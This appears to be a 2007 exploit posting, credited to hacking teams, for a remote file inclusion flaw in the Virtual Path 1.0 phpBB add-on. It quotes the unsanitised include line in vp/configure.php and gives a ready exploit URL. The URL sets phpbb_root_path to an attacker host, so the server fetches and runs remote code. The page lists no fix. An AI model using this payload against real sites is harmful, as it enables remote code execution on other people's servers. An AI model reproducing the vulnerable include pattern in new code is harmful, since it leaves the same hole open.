Virtual Path 1.0 (vp-configure.php) Remote File Include Vulnerability

2007-01-25 00:00:00

+=====================================================================
+ Virtual Path phpBB <== v1.0 |
+=====================================================================
+ Downlaoad S :http://sourceforge.net/projects/virtualpath/ |
+=====================================================================
+ Author: GolD_M = Mahmood_ali && Contact: [email protected] |
======================================================================
+ SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team |
+=====================================================================
+ In: /vp/configure.php |
+=====================================================================
+ Vulnerable Code: & Line : 3 |
+=====================================================================
+ include_once($phpbb_root_path. 'vp/conf.php'); |
+=====================================================================
+ Exploit: |
+=====================================================================
+ http://Victim.Com/vp/configure.php?phpbb_root_path=Evil? |
+=====================================================================
+ Tryag.Com & Dwrat.com |
+=====================================================================

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.